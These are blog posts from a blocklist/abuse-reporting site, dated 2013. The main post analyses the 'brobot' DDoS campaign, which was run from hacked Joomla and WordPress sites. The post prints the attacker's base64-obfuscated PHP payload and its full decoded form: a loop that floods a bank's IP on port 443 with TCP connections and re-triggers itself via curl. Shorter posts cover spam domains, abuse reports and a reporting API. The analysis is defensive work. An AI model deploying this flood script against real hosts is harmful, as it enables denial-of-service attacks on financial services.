2013
01.26

Update from the brobot (ddos against financial institution, like bank of america)

Kategorie: Allgemein, brobot / Tag:  / 3 comments

We seen the first ddos against ns1.google.com and bank of america on 19.09.2012:

https://blog.blocklist.de/2012/09/15/ddos-angriff-auf-ns1-google-com-uber-gehackte-webseiten/

The Hacker abused old installations of „bluestork“-Templates and old WordPress-Sites.

And he upload the complete Script and calls him over get-Parameters to start it.

Then he changed it to upload only html-Forms over old Joomlas < 2.5.7 (most the JCE-Editor was hacked) and use the gif-Failure in php and Skript (the upload-Script has in the first lines a Gif-Header and binary code.

The „file“ Program and Linux says it is an gif-image, but he has after them normal php-code.

Over the Upload-Script, he uploads a small other Script and sends the Data over POST with base64_decode() the complete Data from one of the Post-Data from $_REQUEST[‚mjdu‘] was:


eval(base64" - replace it with _"decode("DQokaWlpPScxNzEuMTYxLjE5OS4xMDAnOw0KJHBwcD0nNDQzJzsNCiRkZGQ9JzM2MDAnOw0KJHNzdHQ9JzMwJzsNCiRycnR0PSc1JzsNCiRwcHNzPSczJzsNCmlmKGZpbGVfZXhpc3RzKCJzdGV4dC50eHQiKS
kNCnsNCgkkZmZwPWZvcGVuKCJzdGV4dC50eHQiLCJyIik7DQoJJHJyPWZyZWFkKCRmZnAsOCk7DQoJZmNsb3NlKCRmZnApOw0KCWlmKCRycj09Ik5vVHRFeFRyVW4iKQ0KCXsNCgkJJGZmcDI9Zm9wZW4oInN0ZXh0LnR4dCIsIncrIik7D
QoJCWZjbG9zZSgkZmZwMik7DQoJCXVubGluaygic3RleHQudHh0Iik7DQoJCWV4aXQoKTsNCgkJZGllKCk7DQoJfQ0KCXVubGluaygic3RleHQudHh0Iik7DQp9DQoNCiRzdGVwX3RpbWU9dGltZSgpKyRzc3R0Ow0KJHJlbGVhc2VfdGlt
ZT10aW1lKCkrJHJydHQ7DQoNCmlmKGlzc2V0KCRfUkVRVUVTVFsndGltZV9lJ10pKQ0Kew0KCSRtYXhfdGltZSA9ICRfUkVRVUVTVFsndGltZV9lJ107DQp9DQplbHNlDQp7DQoJJHRpbWUgPSB0aW1lKCk7DQoJJG1heF90aW1lID0gJHR
pbWUrJGRkZDsNCn0NCgkkb3V0PXN0cl9yZXBlYXQoIi4iLCAkcHBzcyk7DQokZmlyc3QxPTA7DQp3aGlsZSh0aW1lKCkgPCAkbWF4X3RpbWUpDQp7CQ0KCWlmKHRpbWUoKSA+ICRyZWxlYXNlX3RpbWUgJiYgJGZpcnN0MT09MCkNCgl7DQ
oJCSRmaXJzdDE9MTsNCgkJJGFkZHJlc3NfaG9zdD0iaHR0cDovLyIuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLiIvIi4kX1NFUlZFUlsnUEhQX1NFTEYnXTsNCgkJJGRhdGExWydtamR1J109JF9SRVFVRVNUWydtamR1J107DQoJCSRkYXRhM
VsncHNidCddPSRfUkVRVUVTVFsncHNidCddOw0KCQkkZGF0YTFbJ3RpbWVfZSddPSRtYXhfdGltZTsNCgkJJGNoMSA9QGN1cmxfaW5pdCgpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfVVJMLCRhZGRyZXNzX2hvc3QpOw0KCQlj
dXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsRkFMU0UpOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsMik7DQoJCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9IRUFERVIsMSk7DQo
JCWN1cmxfc2V0b3B0KCRjaDEsQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwwKTsNCgkJY3VybF9zZXRvcHQoJGNoMSxDVVJMT1BUX1RJTUVPVVQsMTApOw0KCQljdXJsX3NldG9wdCgkY2gxLENVUkxPUFRfUE9TVCwgdHJ1ZSk7DQoJCWN1cmx
fc2V0b3B0KCRjaDEsQ1VSTE9QVF9QT1NURklFTERTLCAkZGF0YTEpOw0KCQljdXJsX2V4ZWMoJGNoMSk7DQoJCWN1cmxfY2xvc2UoJGNoMSk7DQoJfQ0KCWlmKHRpbWUoKSA+ICRzdGVwX3RpbWUpDQoJew0KCQlAZXhpdCgpOw0KCQlAZGl
lKCk7DQoJfQ0KCSRzb2NrZXQgPSBAc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovLyRpaWk6JHBwcCIsJGVyciwkZXJyMiwxLFNUUkVBTV9DTElFTlRfQVNZTkNfQ09OTkVDVCk7DQoJCWlmICgkc29ja2V0KSANCgkJew0KCQkJQHN0cmV
hbV9zZXRfd3JpdGVfYnVmZmVyKCRzb2NrZXQsIDApOw0KCQkJQHN0cmVhbV9zb2NrZXRfc2VuZHRvKCRzb2NrZXQsJG91dCk7DQoJCX0NCglAZmNsb3NlKCRzb2NrZXQpOzsNCn0NCiRmZnAyPWZvcGVuKCJzdGV4dC50eHQiLCJ3KyIpO2Z
jbG9zZSgkZmZwMik7dW5saW5rKCJzdGV4dC50eHQiKTs="));

 

encoded it was:


$iii='171.161.199.100';
$ppp='443';
$ddd='3600';
$sstt='30';
$rrtt='5';
$ppss='3';
if(file_exists("stext.txt"))
{
$ffp=fopen("stext.txt","r");
$rr=fread($ffp,8);
fclose($ffp);
if($rr=="NoTtExTrUn")
{
$ffp2=fopen("stext.txt","w+");
fclose($ffp2);
unlink("stext.txt");
exit();
die();
}
unlink("stext.txt");
}
$step_time=time()+$sstt;
$release_time=time()+$rrtt;
 
if(isset($_REQUEST['time_e']))
{
$max_time = $_REQUEST['time_e'];
}
else
{
$time = time();
$max_time = $time+$ddd;
}
$out=str_repeat(".", $ppss);
$first1=0;
while(time() < $max_time)
{
if(time() > $release_time && $first1==0)
{
$first1=1;
$address_host="http://".$_SERVER['HTTP_HOST']."/".$_SERVER['PHP_SELF'];
$data1['mjdu']=$_REQUEST['mjdu'];
$data1['psbt']=$_REQUEST['psbt'];
$data1['time_e']=$max_time;
$ch1 =@curl_init();
curl_setopt($ch1,CURLOPT_URL,$address_host);
curl_setopt($ch1,CURLOPT_SSL_VERIFYPEER,FALSE);
curl_setopt($ch1,CURLOPT_SSL_VERIFYHOST,2);
curl_setopt($ch1,CURLOPT_HEADER,1);
curl_setopt($ch1,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch1,CURLOPT_TIMEOUT,10);
curl_setopt($ch1,CURLOPT_POST, true);
curl_setopt($ch1,CURLOPT_POSTFIELDS, $data1);
curl_exec($ch1);
curl_close($ch1);
}
if(time() > $step_time)
{
@exit();
@die();
}
$socket = @stream_socket_client("tcp://$iii:$ppp",$err,$err2,1,STREAM_CLIENT_ASYNC_CONNECT);
if ($socket)
{
@stream_set_write_buffer($socket, 0);
@stream_socket_sendto($socket,$out);
}
@fclose($socket);;
}
$ffp2=fopen("stext.txt","w+");fclose($ffp2);unlink("stext.txt");

Why he use:
@exit();
and
@die();
one of them are enough 😉 die() is the same like exit() ->
function die on php.net

brobot-ddos-01-2013

 

There was better code after the first script, in which he has curl-functions again and again. For this code you usually uses functionals to deduce double code 🙂

on the 22.01.2013 we found over 250 abused Joomla-Installations.

Today (25.01.2013) he hacks Joomla Installations with a Version under 2.5.8 and WordPress with older Plugins like akisment version 2.5.5.

Is is necessary to update your Installations very fast or your Server attacks us-financial institutions 🙂

Think about over 250 hacked sites on Servers from only one hoster to create a ddos, you have a lot of power and bandwidth and we think in the world, there a very large numbers of old Joomla-Installations on Servers 🙂

-google-ads-
2013
01.16

Blackhat Seo-Spam from *.pl-Domains hosted on OVH on 178.33.177.193

Kategorie: Allgemein / Tag:  / Kommentare deaktiviert für Blackhat Seo-Spam from *.pl-Domains hosted on OVH on 178.33.177.193

In the last Days and Weeks, we get a very large List of SEO-/Spam-URLs with .pl-Domains like this:

http://38291.8gx5zj6a7.pl/

http://20851.y5pcbti2p.pl/

http://10533.m6lkmh37r.pl/

http://35754.igzkbz6j1.pl/

 

Now the Spamer has changed the Server. The Domains linked now to the IP 178.33.177.193 hosted on OVH-System.

We send for the Spam-URLs a X-ARF-Report via spamlinks.blocklist.de to the Abuse-Department to look at the the Spam-URL. We send only a Report, when the Spam-Score is high enough. So, the false-positive rate is under 5%.

We recommd to block the IP in all Firewalls and Gateways.

-google-ads-
2013
01.10

13 IPs from MSN (MICROSOFT-CORP—MSN-AS-BLOCK – Microsoft Corp) was abused for forum-spam-/ssh-/voip-Attacks

Kategorie: Allgemein / Tag:  / 2 comments

In the last Days we see 13 IPs from the Network MICROSOFT-CORP—MSN-AS-BLOCK – Microsoft Corp // ASN8075 from a lot of Forum-Spam-/SSH-/Voip-/SIP-Attacks.

We send the default X-ARF-Abuse-Complaint, but only the Server which makes SSH-/Sip-Attacks was stoped or not longer reported to us.

So, we send a normal Mail to noc@microsoft.com, abuse@microsoft… abuse@msn…. but received only the acknowledgement-Mail and a bounce-Mail from noc@ that the account does not exist, but is aviable in the Whois-Data.

On the Server there are the rdp-Port open:

nmap-ms

 

We thinking there are Developement-Systems there was hacked or false configured, that he have a (Reverse)Proxy which allows to get URLs from other URLs and not only from the same system.

Some IPs was heavy, like this IP 157.56.166.51 he has send over 760400 Spam-Comments/Posts or automatically Registrations in Honeypot-Systems. The most IPs was stopped or was never reported to us after yesterday, but one IP is still alive.

We wait for a Answer from microsoft so far 😐

[UPDATE 22.07.2013 11:00:00]
We received an Anser from Microsoft:
 


Hello,

Thank you for bringing this to our attention, please file a response to
http://cert.microsoft.com. Then our security teams will start that
investigation, also you can use that in the future to report suspicious
Microsoft IPs.

Thank you,

Rechie
Online Safety Team

We have try to send a Report, but get only the following error-message:
An internal error has occured, please try again. Object reference not set to an instance of an object.
With an fake Referer, the Form works.
But dear Microsoft, please use a X-ARF-Parser and generate a new Report with your own format from your Form.

-google-ads-
2013
01.02

Angriffer per HTTP (GET/POST) an blocklist melden (ohne Fail2Ban/DenyHost/Mails)

Kategorie: Allgemein / Tag:  / Kommentare deaktiviert für Angriffer per HTTP (GET/POST) an blocklist melden (ohne Fail2Ban/DenyHost/Mails)

Wir haben soeben die BETA für die HTTP-API online gestellt:

http://www.blocklist.de/de/httpreports.html

 

Darüber kann man mit z.B. curl/lynx/wget die Daten an BlockList.de melden und braucht kein Mailsystem auf dem Server zu installieren.

Es benötigt zum aufrufen folgende Daten:

  • Server-E-Mailadresse oder ID
  • Server-API-Key
  • Attacker-IP
  • angegriffener Dienst (ssh, imap, ftp….)
  • Logfiles
  • format (xml, json, text, php)

Dann kann man die Daten per POST/GET absenden:

curl -s „http://www.blocklist.de/de/httpreports.html?server=$email@server.tld&apikey=$apikey&ip=$angreiferIP&service=$dienst&logs=urlencode($logs)&format=php“

Je nach dem, wie das Rückgabe-Format ist, hat man die Variablen status und error:

 

xml:

<status>success</status>

<error>0</error>

 

Wenn status den Inhalt success, dann hat alles gepasst.

Ansonsten ist die Variable $error nicht 0 und hat man hat je nach Fehler-Art diese in $error enthalten:

<server>API-Key stimmt nicht mit dem Server ueberein.</server>

<status>error</status>

 

Da es noch nicht wirklich erprobt ist und bisher nur von mir getestet wurde, kann es noch Bugs geben. Bitte alle Bugs oder Wünsche daher an uns melden. Danke!

-google-ads-
Translate »